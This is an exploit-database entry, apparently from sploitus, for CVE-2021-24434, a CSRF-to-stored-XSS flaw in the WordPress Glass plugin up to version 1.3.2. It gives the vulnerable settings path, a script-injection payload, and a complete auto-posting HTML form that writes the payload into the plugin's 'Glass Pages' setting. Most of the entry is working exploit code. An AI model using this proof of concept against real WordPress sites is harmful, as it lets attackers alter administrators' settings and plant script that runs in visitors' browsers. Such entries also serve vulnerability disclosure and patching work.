Exploit for Glass <= 1.3.2 - CSRF to Stored Cross-Site Scripting (XSS) CVE-2021-24434

Name: Exploit for Glass <= 1.3.2 - CSRF to Stored Cross-Site Scripting (XSS) CVE-2021-24434
Rating: 5 (336 reviews)

2021-06-21 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:DBEA2DC2-83F6-4E70-B044-A68A4C9B9C39
Add the following payload in the "Glass Pages" setting (/wp-admin/options-general.php?page=glass%2Fglass.php): '><script>alert(/XSS/)</script>

Via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=glass/glass.php" method="POST">
      <input type="hidden" name="myrtheGlassDefaultSize" value="4" />
      <input type="hidden" name="myrtheGlassRimPath" value="" />
      <input type="hidden" name="myrtheGlassRimRGB" value="CC6633" />
      <input type="hidden" name="myrtheGlassBackgroundRGB" value="999999" />
      <input type="hidden" name="myrtheGlassMinEnlarge" value="2.0" />
      <input type="hidden" name="myrtheGlassMaxEnlarge" value="100.0" />
      <input type="hidden" name="myrtheGlassDx" value="0" />
      <input type="hidden" name="myrtheGlassDy" value="0" />
      <input type="hidden" name="myrtheGlassOnFrontPage" value="y" />
      <input type="hidden" name="myrtheGlassCategories" value="" />
      <input type="hidden" name="myrtheGlassPages" value="'><script>alert(/XSS/)</script>" />
      <input type="hidden" name="myrtheGlassExcludePlatforms" value="iPod" />
      <input type="hidden" name="update_MyrtheGlassSettings" value="Update Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>